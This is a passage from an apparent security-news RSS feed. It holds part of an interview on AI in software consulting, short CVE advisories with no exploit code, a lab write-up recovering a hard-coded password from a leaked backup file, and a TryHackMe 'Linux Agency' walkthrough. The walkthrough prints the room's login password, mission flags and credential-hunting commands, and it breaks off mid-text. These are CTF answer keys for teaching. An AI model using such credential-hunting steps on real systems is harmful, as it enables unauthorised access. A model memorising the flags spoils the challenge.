<p class="wp-block-paragraph"><strong>Erickson:</strong> “The hype can be summed up in a single phrase: <a href="https://www.computerworld.com/article/4022711/when-everything-is-vibing.html">vibe coding</a>. That has done AI a massive disservice, because there’s a huge difference between vibe coding and enterprise software development, and some of the loudest proponents of AI are too latched on to it. In our industry, the only way to succeed would be a stable of unicorns. It just doesn’t scale. I get perturbed when our people internally refer to AI tooling as vibe coding; if they think that’s what they’re doing, they’re misunderstood.“</p>



<p class="wp-block-paragraph"><strong>When you engage clients at different levels of AI maturity, how do you get them to a understand what works?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “95% of our take on an agentic approach is in line with everyone else’s, but that 5% matters, especially in requirements discovery, in who’s giving the requirements and how they’re thought of. It can set you up for dramatic errors, given the speed at which you’re moving.</p>



<p class="wp-block-paragraph">“There’s a dangerous human tendency we’re seeing among clients to try and cut corners at the start of a project and — in lieu of having deep, expert driven discovery sessions — just summarize what they may want using AI.</p>



<p class="wp-block-paragraph">“We would hope our clients are collaborative, everyone understanding it’s early days. If a client insists on doing something we feel strongly against, like a product owner completely owning everything right up to code generation, that’s an issue we have to either push back strongly on or step out of the accountability for.“</p>



<p class="wp-block-paragraph"><strong>AI body shops — LLM providers and giant consultancies — are emerging to help enterprises deploy AI. Does that model work?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “Whether you’re partnering with an LLM or with an AI-first, generic software provider — ‘Hey, we’re not industry guys, but we know AI delivery’ — you end up, if you’re a bank or a broker-dealer, saying: ‘All right, we know our business, these guys know the AI side of it. What could go wrong? Put us together and we’ll have quality engineering.’</p>



<p class="wp-block-paragraph">“The problem is what you miss: the know-how of putting industry and technical expertise together and actually delivering financial services systems. The people working at the generic delivery firms, whether an AI-only firm or a body shop somewhere, don’t have that capability.“</p>



<p class="wp-block-paragraph"><strong>Does AI change the economics for smaller consultancies like yours competing against the big firms, and does it cut both ways?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “Over our 15 years pre-AI, there were two recurring reasons we’d lose a project. One: ‘We’d love to work with you guys, given your subject matter expertise, but the costs just aren’t there compared to my budgets. I’m being forced to go to a body shop or an [offshore] delivery center.’ The other side of that coin: ‘We love your capabilities, but you’re a firm of 230 people and I need 300, 400 people.’</p>



<p class="wp-block-paragraph">“AI changes the options for clients. You don’t have to sacrifice the niche vendor who knows your space just because you need a larger team or a cost target. AI levels the playing field and should allow smaller firms to compete with the larger, big-box generic firms, the Accentures of the world.“</p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “It redefines what scale means. You can look at velocity as a measure of your cost to deliver, not a rate card. Scale can’t be defined in terms of headcount anymore. It’s got to be defined in terms of output.</p>



<p class="wp-block-paragraph">“There’s a threat in it, too. If you’re an Accenture with hundreds of thousands of low-cost software engineers, how do you train all those people? I feel for them. But for us, a couple hundred people with a specific domain focus, it’s a huge opportunity.“</p>



<p class="wp-block-paragraph"><strong>How has the profile of the people you and others hire changed with this agentic process?</strong></p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “You’re still looking for people with strong engineering and design backgrounds, and communication skills, because they interact across the software development lifecycle more than in the past.</p>



<p class="wp-block-paragraph">“Many take too much joy in typing out perfect code. Sorry, I don’t need you writing for-loops and classes anymore. I need you reviewing them, understanding them, operating at a higher level. That’s a different kind of person: an engineer, not a programmer or a coder. On the [business analyst] side it’s similar: people took great pride in detailed user stories covering every path. Now it’s conversations, prompts, reviewing output — less doing, more interacting.</p>



<p class="wp-block-paragraph">“More than ever, they have to be interested in the domain. They can’t just be, ‘I want to learn everything there is to know about Java.’ That’s too narrow. They don’t have to be an expert; they have to be interested. In our case, capital markets is a specific niche. The biggest challenge is getting familiar with the tools — finding time, while delivering for customers, to ramp up and make the mistakes you need to without jeopardizing projects.“</p>



<p class="wp-block-paragraph"><strong>What about governance? Who’s keeping AI delivery and its costs under control?</strong></p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “This is evolving rapidly. People aren’t sure how to put governance around this. The most obvious is financial governance. People are starting to get hefty bills. One of our clients spent a million dollars on tokens over the last eight weeks alone. Sticker shock. The token-maxing policies are starting to show their flaws. It’s wild west still: learn on the fly, then figure out what needs to be governed.“</p>



<p class="wp-block-paragraph"><strong>Are CIOs actually opening their wallets? And when they do, what’s the smarter way to invest?</strong></p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “There’s still a lot of caution. Forecasts keep going down on how long something should take. So: ‘I could wait three months and maybe still get it delivered by the same date someone’s promising me now, but for half the price. I’m going to wait and see when equilibrium is met.’ We haven’t seen the wallets open up like crazy — it’s slow adoption.“</p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “One of our clients is looking at it from a productivity-boost perspective: instead of doing the same for less, I can do much more for the same. AI lets clients pull the trigger on things they wouldn’t have in the past — projects that might not have been approved pre-AI, where the costs have come down to a point that’s palatable with the business.“</p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “And that’s the story we’re hoping to hear more of. There isn’t a huge cost anymore to exploring a business opportunity. The time and money that would have gone to a return-on-investment study could be spent on a proof-of-concept with AI, and the project done a few weeks later. Maybe [there’s] a hint of things to come, where decisions start being made quicker. </p>



<p class="wp-block-paragraph">“There’s a little fear on our side, though: a lot of tiny little projects is tough for a consulting business.“</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-55548 | Yamcs up to 5.12.7/5.13.1 Packets Endpoint PacketsApi.java exportPackets nameSet access control]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in Yamcs up to 5.12.7/5.13.1. This vulnerability affects the function exportPackets of the file yamcs-core/src/main/java/org/yamcs/http/api/PacketsApi.java of the component Packets Endpoint. This manipulation of the argument nameSet caus...]]></description>
<link>https://tsecurity.de/de/3680840/sicherheitsluecken/cve-2026-55548-yamcs-up-to-51275131-packets-endpoint-packetsapijava-exportpackets-nameset-access-control/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680840/sicherheitsluecken/cve-2026-55548-yamcs-up-to-51275131-packets-endpoint-packetsapijava-exportpackets-nameset-access-control/</guid>
<pubDate>Mon, 20 Jul 2026 12:24:19 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/yamcs">Yamcs up to 5.12.7/5.13.1</a>. This vulnerability affects the function <code>exportPackets</code> of the file <em>yamcs-core/src/main/java/org/yamcs/http/api/PacketsApi.java</em> of the component <em>Packets Endpoint</em>. This manipulation of the argument <em>nameSet</em> causes improper access controls.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2026-55548">CVE-2026-55548</a>. The attack can be initiated remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-46562 | Yamcs up to 5.12.6 Script Algorithm Executor ScriptAlgorithmExecutorFactory.java getRuntime algorithm text os command injection]]></title>
<description><![CDATA[A vulnerability described as very critical has been identified in Yamcs up to 5.12.6. Affected by this vulnerability is the function getRuntime of the file yamcs-core/src/main/java/org/yamcs/algorithms/ScriptAlgorithmExecutorFactory.java of the component Script Algorithm Executor. The manipulatio...]]></description>
<link>https://tsecurity.de/de/3680386/sicherheitsluecken/cve-2026-46562-yamcs-up-to-5126-script-algorithm-executor-scriptalgorithmexecutorfactoryjava-getruntime-algorithm-text-os-command-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680386/sicherheitsluecken/cve-2026-46562-yamcs-up-to-5126-script-algorithm-executor-scriptalgorithmexecutorfactoryjava-getruntime-algorithm-text-os-command-injection/</guid>
<pubDate>Mon, 20 Jul 2026 08:24:04 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">very critical</a> has been identified in <a href="https://vuldb.com/product/yamcs">Yamcs up to 5.12.6</a>. Affected by this vulnerability is the function <code>getRuntime</code> of the file <em>yamcs-core/src/main/java/org/yamcs/algorithms/ScriptAlgorithmExecutorFactory.java</em> of the component <em>Script Algorithm Executor</em>. The manipulation of the argument <em>algorithm text</em> results in os command injection.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2026-46562">CVE-2026-46562</a>. The attack can be executed remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-44891 | Netty prior 4.1.136.Final/4.2.16.Final StompSubframeDecoder StompSubframeDecoder.java maxLineLength denial of service (Nessus ID 327823)]]></title>
<description><![CDATA[A vulnerability has been found in Netty and classified as problematic. Affected by this issue is some unknown functionality of the file io/netty/handler/codec/stomp/StompSubframeDecoder.java of the component StompSubframeDecoder. This manipulation of the argument maxLineLength causes denial of se...]]></description>
<link>https://tsecurity.de/de/3679991/sicherheitsluecken/cve-2026-44891-netty-prior-41136final4216final-stompsubframedecoder-stompsubframedecoderjava-maxlinelength-denial-of-service-nessus-id-327823/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679991/sicherheitsluecken/cve-2026-44891-netty-prior-41136final4216final-stompsubframedecoder-stompsubframedecoderjava-maxlinelength-denial-of-service-nessus-id-327823/</guid>
<pubDate>Sun, 19 Jul 2026 23:08:51 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/netty">Netty</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this issue is some unknown functionality of the file <em>io/netty/handler/codec/stomp/StompSubframeDecoder.java</em> of the component <em>StompSubframeDecoder</em>. This manipulation of the argument <em>maxLineLength</em> causes denial of service.

This vulnerability appears as <a href="https://vuldb.com/cve/CVE-2026-44891">CVE-2026-44891</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-16222 | 1Panel-dev CordysCRM up to 1.4.1 Third Party Endpoint TokenService.java mkAddress server-side request forgery (2685/2686 / EUVD-2026-45432)]]></title>
<description><![CDATA[A vulnerability classified as critical has been found in 1Panel-dev CordysCRM up to 1.4.1. This issue affects some unknown processing of the file backend/crm/src/main/java/cn/cordys/crm/integration/sso/service/TokenService.java of the component Third Party Endpoint. Performing a manipulation of t...]]></description>
<link>https://tsecurity.de/de/3679293/sicherheitsluecken/cve-2026-16222-1panel-dev-cordyscrm-up-to-141-third-party-endpoint-tokenservicejava-mkaddress-server-side-request-forgery-26852686-euvd-2026-45432/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679293/sicherheitsluecken/cve-2026-16222-1panel-dev-cordyscrm-up-to-141-third-party-endpoint-tokenservicejava-mkaddress-server-side-request-forgery-26852686-euvd-2026-45432/</guid>
<pubDate>Sun, 19 Jul 2026 12:09:57 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/1panel-dev:cordyscrm">1Panel-dev CordysCRM up to 1.4.1</a>. This issue affects some unknown processing of the file <em>backend/crm/src/main/java/cn/cordys/crm/integration/sso/service/TokenService.java</em> of the component <em>Third Party Endpoint</em>. Performing a manipulation of the argument <em>mkAddress</em> results in server-side request forgery.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-16222">CVE-2026-16222</a>. The attack may be initiated remotely. In addition, an exploit is available.

The project closed the issue report, stating that this is not the official way to report a security vulnerability.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-16223 | 1Panel-dev CordysCRM up to 1.4.1 Third Party Edit Endpoint IntegrationConfigService.java getSqlBotSrc appSecret server-side request forgery (2687/2688 / EUVD-2026-45433)]]></title>
<description><![CDATA[A vulnerability classified as critical was found in 1Panel-dev CordysCRM up to 1.4.1. Impacted is the function getSqlBotSrc of the file backend/crm/src/main/java/cn/cordys/crm/system/service/IntegrationConfigService.java of the component Third Party Edit Endpoint. Executing a manipulation of the ...]]></description>
<link>https://tsecurity.de/de/3679292/sicherheitsluecken/cve-2026-16223-1panel-dev-cordyscrm-up-to-141-third-party-edit-endpoint-integrationconfigservicejava-getsqlbotsrc-appsecret-server-side-request-forgery-26872688-euvd-2026-45433/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679292/sicherheitsluecken/cve-2026-16223-1panel-dev-cordyscrm-up-to-141-third-party-edit-endpoint-integrationconfigservicejava-getsqlbotsrc-appsecret-server-side-request-forgery-26872688-euvd-2026-45433/</guid>
<pubDate>Sun, 19 Jul 2026 12:09:55 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> was found in <a href="https://vuldb.com/product/1panel-dev:cordyscrm">1Panel-dev CordysCRM up to 1.4.1</a>. Impacted is the function <code>getSqlBotSrc</code> of the file <em>backend/crm/src/main/java/cn/cordys/crm/system/service/IntegrationConfigService.java</em> of the component <em>Third Party Edit Endpoint</em>. Executing a manipulation of the argument <em>appSecret</em> can lead to server-side request forgery.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2026-16223">CVE-2026-16223</a>. The attack may be launched remotely. Furthermore, there is an exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Java was a three-day hotfix away from dying horribly on stage]]></title>
<description><![CDATA[Tim Lindholm, Java's original JVM maintainer, shares with El Reg some of the grungy build details the doc glosses over]]></description>
<link>https://tsecurity.de/de/3678094/it-nachrichten/java-was-a-three-day-hotfix-away-from-dying-horribly-on-stage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678094/it-nachrichten/java-was-a-three-day-hotfix-away-from-dying-horribly-on-stage/</guid>
<pubDate>Sat, 18 Jul 2026 15:47:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Tim Lindholm, Java's original JVM maintainer, shares with El Reg some of the grungy build details the doc glosses over]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-16088 | halo-dev halo up to 2.24.2 Files Backup Endpoint MigrationEndpoint.java download path traversal (Issue 10064 / EUVD-2026-45369)]]></title>
<description><![CDATA[A vulnerability was found in halo-dev halo up to 2.24.2. It has been classified as critical. Affected by this vulnerability is the function Download of the file MigrationEndpoint.java of the component Files Backup Endpoint. Performing a manipulation results in path traversal.

This vulnerability ...]]></description>
<link>https://tsecurity.de/de/3678083/sicherheitsluecken/cve-2026-16088-halo-dev-halo-up-to-2242-files-backup-endpoint-migrationendpointjava-download-path-traversal-issue-10064-euvd-2026-45369/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678083/sicherheitsluecken/cve-2026-16088-halo-dev-halo-up-to-2242-files-backup-endpoint-migrationendpointjava-download-path-traversal-issue-10064-euvd-2026-45369/</guid>
<pubDate>Sat, 18 Jul 2026 15:38:45 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/halo-dev:halo">halo-dev halo up to 2.24.2</a>. It has been classified as <a href="https://vuldb.com/kb/risk">critical</a>. Affected by this vulnerability is the function <code>Download</code> of the file <em>MigrationEndpoint.java</em> of the component <em>Files Backup Endpoint</em>. Performing a manipulation results in path traversal.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2026-16088">CVE-2026-16088</a>. The attack is possible to be carried out remotely. Moreover, an exploit is present.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-56740 | JLine up to 3.30.13/4.0.15/4.2.0 Telnet Server Remote-telnet TelnetIO.java readNEVariables heap-based overflow (EUVD-2026-45343)]]></title>
<description><![CDATA[A vulnerability labeled as problematic has been found in JLine up to 3.30.13/4.0.15/4.2.0. This vulnerability affects the function readNEVariables of the file TelnetIO.java of the component Telnet Server Remote-telnet Module. The manipulation results in heap-based buffer overflow.

This vulnerabi...]]></description>
<link>https://tsecurity.de/de/3677342/sicherheitsluecken/cve-2026-56740-jline-up-to-330134015420-telnet-server-remote-telnet-telnetiojava-readnevariables-heap-based-overflow-euvd-2026-45343/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677342/sicherheitsluecken/cve-2026-56740-jline-up-to-330134015420-telnet-server-remote-telnet-telnetiojava-readnevariables-heap-based-overflow-euvd-2026-45343/</guid>
<pubDate>Sat, 18 Jul 2026 04:38:53 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/jline">JLine up to 3.30.13/4.0.15/4.2.0</a>. This vulnerability affects the function <code>readNEVariables</code> of the file <em>TelnetIO.java</em> of the component <em>Telnet Server Remote-telnet Module</em>. The manipulation results in heap-based buffer overflow.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-56740">CVE-2026-56740</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-56741 | JLine prior 3.30.14/4.0.16/4.2.1 Telnet server remote-telnet module TelnetIO.java handleNAWS width/height resource consumption (EUVD-2026-45342)]]></title>
<description><![CDATA[A vulnerability classified as problematic was found in JLine. This issue affects the function handleNAWS of the file TelnetIO.java of the component Telnet server remote-telnet module. Such manipulation of the argument width/height leads to resource consumption.

This vulnerability is listed as CV...]]></description>
<link>https://tsecurity.de/de/3677340/sicherheitsluecken/cve-2026-56741-jline-prior-330144016421-telnet-server-remote-telnet-module-telnetiojava-handlenaws-widthheight-resource-consumption-euvd-2026-45342/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677340/sicherheitsluecken/cve-2026-56741-jline-prior-330144016421-telnet-server-remote-telnet-module-telnetiojava-handlenaws-widthheight-resource-consumption-euvd-2026-45342/</guid>
<pubDate>Sat, 18 Jul 2026 04:38:50 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> was found in <a href="https://vuldb.com/product/jline">JLine</a>. This issue affects the function <code>handleNAWS</code> of the file <em>TelnetIO.java</em> of the component <em>Telnet server remote-telnet module</em>. Such manipulation of the argument <em>width/height</em> leads to resource consumption.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2026-56741">CVE-2026-56741</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[IntelliJ IDEA 2026.2 integriert Copilot und bietet Support für TypeScript 7.0]]></title>
<description><![CDATA[Die IDE ermöglicht die direkte Verwendung von GitHub Copilot und kann mit neuen Versionen der Programmiersprachen Java, Kotlin und TypeScript umgehen.]]></description>
<link>https://tsecurity.de/de/3676297/it-nachrichten/intellij-idea-20262-integriert-copilot-und-bietet-support-fuer-typescript-70/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676297/it-nachrichten/intellij-idea-20262-integriert-copilot-und-bietet-support-fuer-typescript-70/</guid>
<pubDate>Fri, 17 Jul 2026 16:18:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die IDE ermöglicht die direkte Verwendung von GitHub Copilot und kann mit neuen Versionen der Programmiersprachen Java, Kotlin und TypeScript umgehen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Lab 3 : Source code disclosure via backup files]]></title>
<description><![CDATA[Lab ObjectiveThe goal of this lab is to locate leaked backup files and extract a hard-coded database password from the disclosed source code.Step-by-Step Solution1. Check robots.txt for hidden pathsrobots.txt is designed to tell search engine crawlers which paths not to index :/robots.txtrevealed...]]></description>
<link>https://tsecurity.de/de/3675349/hacking/lab-3-source-code-disclosure-via-backup-files/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675349/hacking/lab-3-source-code-disclosure-via-backup-files/</guid>
<pubDate>Fri, 17 Jul 2026 09:23:39 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Lab Objective</h3><p>The goal of this lab is to locate leaked backup files and extract a hard-coded database password from the disclosed source code.</p><h3>Step-by-Step Solution</h3><h3>1. Check robots.txt for hidden paths</h3><p>robots.txt is designed to tell search engine crawlers which paths <em>not</em> to index :</p><pre>/robots.txt</pre><p>revealed a disallowed /backup directory.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*immgMfnDuweHpMSvq1MSKg.png"></figure><h3>2. Enumerate the backup directory</h3><p>Browsing directly to /backup surfaced a file named:</p><pre>ProductTemplate.java.bak</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*SWdXYo2qj8lWL7McnE3Rfw.png"></figure><h3>3. Retrieve and read the leaked source file</h3><p>Navigating to:</p><pre>/backup/ProductTemplate.java.bak</pre><h3>4. Extract the hard-coded credential</h3><p>Reading through the disclosed source, the database connection logic contained a hard-coded password used to authenticate against a Postgres database.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ALxf9SLF4iQJ2ez87_TlEA.png"></figure><h3>5. Submit the solution</h3><p>I copied the password value, returned to the lab, clicked <strong>Submit solution</strong>, and entered it. The lab was marked as solved.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ihofmuPt9xxS9TAlUQA-tQ.png"></figure><h3>Written by Zeyad Naguib,<br>🔗 <a href="https://www.linkedin.com/in/zeyadnageeb">https://www.linkedin.com/in/zeyadnageeb</a><br>✍️ <a href="https://medium.com/@zeyadnaguib1">https://medium.com/@zeyadnaguib1</a></h3><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=54b056ee6d36" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/lab-3-source-code-disclosure-via-backup-files-54b056ee6d36">Lab 3 : Source code disclosure via backup files</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TryHackMe — Linux Agency | Complete Write-Up & Walkthrough]]></title>
<description><![CDATA[“Agent 47, your mission begins. 30 targets stand between you and the root.”Author: Shikhali JamalzadeGitHub: github.com/alisaliveLinkedIn: linkedin.com/in/camalzads📋 Room OverviewPlatform TryHackMe Room Name Linux Agency Link https://tryhackme.com/room/linuxagency Difficulty Medium Category Linux...]]></description>
<link>https://tsecurity.de/de/3675298/hacking/tryhackme-linux-agency-complete-write-up-walkthrough/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675298/hacking/tryhackme-linux-agency-complete-write-up-walkthrough/</guid>
<pubDate>Fri, 17 Jul 2026 09:09:38 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*KSkSbmZiLuuvwoZUpWjb2w.png"></figure><blockquote>“Agent 47, your mission begins. 30 targets stand between you and the root.”<br>Author: <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a><br>GitHub<strong>:</strong> <a href="https://github.com/alisalive">github.com/alisalive</a><br>LinkedIn<strong>:</strong> <a href="https://linkedin.com/in/camalzads">linkedin.com/in/camalzads</a></blockquote><h3>📋 Room Overview</h3><p><strong>Platform</strong> TryHackMe <br><strong>Room Name</strong> Linux Agency <br><strong>Link</strong> <a href="https://tryhackme.com/room/linuxagency">https://tryhackme.com/room/linuxagency</a> <br><strong>Difficulty</strong> Medium <br><strong>Category</strong> Linux Fundamentals + Privilege Escalation <br><strong>Initial Access</strong> SSH (agent47)</p><h3>🎯 About This Room</h3><p><strong>Linux Agency</strong> is one of the most comprehensive Linux-focused rooms on TryHackMe. You play the role of <strong>Agent 47</strong> — a secret agent tasked with infiltrating the ICA Agency, chaining through <strong>30 mission accounts</strong>, eliminating special targets, and ultimately achieving <strong>root</strong>.</p><p>This room goes far beyond basic Linux commands — it forces you to think like a real penetration tester. Topics covered:</p><ul><li>🐧 Deep Linux fundamentals (hidden files, permissions, environment variables)</li><li>💻 Multiple programming languages (Python, Ruby, Java, C)</li><li>🔐 Encoding/decoding (Base64, Binary, Hex)</li><li>📅 Cron job exploitation</li><li>⚡ Sudo privilege escalation via GTFOBins</li><li>🐳 Docker privilege escalation</li><li>🔑 SSH private key cracking</li></ul><h3>🛠️ Tools Used</h3><ul><li>ssh, su, find, grep, cat, ls, strings, file</li><li>base64, xxd</li><li>gcc, javac, java, python3, ruby</li><li>netcat (nc)</li><li>ssh2john + john (John the Ripper)</li><li>ss (socket statistics)</li><li>GTFOBins</li><li>Docker</li></ul><h3>⚙️ Setup</h3><p>Start the machine on TryHackMe and wait about a minute. Then connect:</p><pre>ssh agent47@&lt;MACHINE_IP&gt;</pre><p><strong>Password:</strong> 640509040147</p><p>Once connected you’ll see:</p><pre>agent47@linuxagency:~$</pre><p>The mission begins. 🚀</p><h3>🗂️ Task 2: Initial Access</h3><p>The room’s mechanic is straightforward:</p><ul><li>Every flag found acts as the <strong>password</strong> for the next user</li><li>Flag format: missionX{md5_hash}</li><li>Chain: agent47 → mission1 → mission2 → ... → mission30 → viktor → ...</li></ul><h3>🔍 Task 3: Linux Fundamentals (Mission 1–30 + Viktor)</h3><h3>🎯 Mission 1</h3><p>As <strong>agent47</strong>, the first task is finding mission1’s flag.</p><pre>find / -type f -name "*.txt" 2&gt;/dev/null<br># Or directly check:<br>ls /home/mission1/<br>cat /home/mission1/&lt;flag_file&gt;</pre><p>Now switch to mission1:</p><pre>su mission1<br># Password: mission1{174dc8f191bcbb161fe25f8a5b58d1f0}</pre><blockquote><strong>💡 What we learned:</strong><em> </em><em>find for filesystem-wide searching, understanding the </em><em>/home directory structure.</em></blockquote><h3>🎯 Mission 2</h3><p>As <strong>mission1</strong>:</p><pre>find / -type f -name "mission2" 2&gt;/dev/null<br>cat &lt;found_path&gt;</pre><pre>su mission2<br># Password: mission2{8a1b68bb11e4a35245061656b5b9fa0d}</pre><h3>🎯 Mission 3</h3><pre># As mission2:<br>grep -r "mission3" . 2&gt;/dev/null</pre><pre>su mission3<br># Password: mission3{ab1e1ae5cba688340825103f70b0f976}</pre><blockquote><strong>💡 What we learned:</strong><em> </em><em>grep -r for recursive content searching across directories.</em></blockquote><h3>🎯 Mission 4</h3><pre># As mission3:<br>cd /home/mission3<br>ls<br>cat flag.txt</pre><pre>su mission4<br># Password: mission4{264a7eeb920f80b3ee9665fafb7ff92d}</pre><h3>🎯 Missions 5–8</h3><p>These follow a similar pattern — searching the filesystem:</p><pre># As mission4:<br>grep -r "mission5" / 2&gt;/dev/null<br>su mission5<br># Password: mission5{bc67906710c3a376bcc7bd25978f62c0}</pre><pre># As mission5:<br>grep -r "mission6" / 2&gt;/dev/null<br>su mission6<br># Password: mission6{1fa67e1adc244b5c6ea711f0c9675fde}</pre><pre># As mission6:<br>grep -r "mission7" / 2&gt;/dev/null<br>su mission7<br># Password: mission7{53fd6b2bad6e85519c7403267225def5}</pre><pre># As mission7:<br>grep -r "mission8" / 2&gt;/dev/null<br>su mission8<br># Password: mission8{3bee25ebda7fe7dc0a9d2f481d10577b}</pre><h3>🎯 Mission 9</h3><pre># As mission8:<br>ls<br>cat flag.txt</pre><pre>su mission9<br># Password: mission9{ba1069363d182e1c114bef7521c898f5}</pre><h3>🎯 Missions 10–11</h3><pre># As mission9:<br>grep -r "mission10" / 2&gt;/dev/null<br>su mission10<br># Password: mission10{0c9d1c7c5683a1a29b05bb67856524b6}</pre><pre># As mission10:<br>grep -r "mission11" / 2&gt;/dev/null<br>su mission11<br># Password: mission11{db074d9b68f06246944b991d433180c0}</pre><h3>🎯 Mission 12 — Environment Variable</h3><p>This time the flag is hidden inside an <strong>environment variable</strong>, not a file!</p><pre># As mission11:<br>env | grep mission12</pre><pre>su mission12<br># Password: mission12{f449a1d33d6edc327354635967f9a720}</pre><blockquote><strong>💡 What we learned:</strong><em> The </em><em>env command lists all environment variables. In real-world pentesting, environment variables frequently contain credentials, API keys, and sensitive data — always check them!</em></blockquote><h3>🎯 Mission 13 — File Permissions</h3><pre># As mission12:<br>ls -la /home/mission12/<br># flag.txt exists but you have no read permission!<br>chmod 777 /home/mission12/flag.txt<br>cat /home/mission12/flag.txt</pre><pre>su mission13<br># Password: mission13{076124e360406b4c98ecefddd13ddb1f}</pre><blockquote><strong>💡 What we learned:</strong><em> Linux file permissions and </em><em>chmod. Always use </em><em>ls -la — the </em><em>-a flag reveals hidden files and the </em><em>-l flag shows permissions clearly.</em></blockquote><h3>🎯 Mission 14 — Base64 Decode</h3><pre># As mission13:<br>cat /home/mission13/flag.txt | base64 -d</pre><pre>su mission14<br># Password: mission14{d598de95639514b9941507617b9e54d2}</pre><blockquote><strong>💡 What we learned:</strong><em> Base64 encoding/decoding. Strings ending with </em><em>= or </em><em>== are almost always Base64-encoded. The </em><em>base64 -d flag decodes them directly in the terminal.</em></blockquote><h3>🎯 Mission 15 — Binary → ASCII</h3><pre># As mission14:<br>cat /home/mission14/flag.txt<br># You'll see binary digits: 01101101 01101001 ...</pre><p>Convert the binary to ASCII using Python:</p><pre>python3 -c "<br>binary = '01101101 01101001 01110011 01110011 01101001 01101111 01101110 00110001 00110101'<br>chars = binary.split()<br>result = ''.join([chr(int(b, 2)) for b in chars])<br>print(result)<br>"</pre><p>Or use an online tool: <a 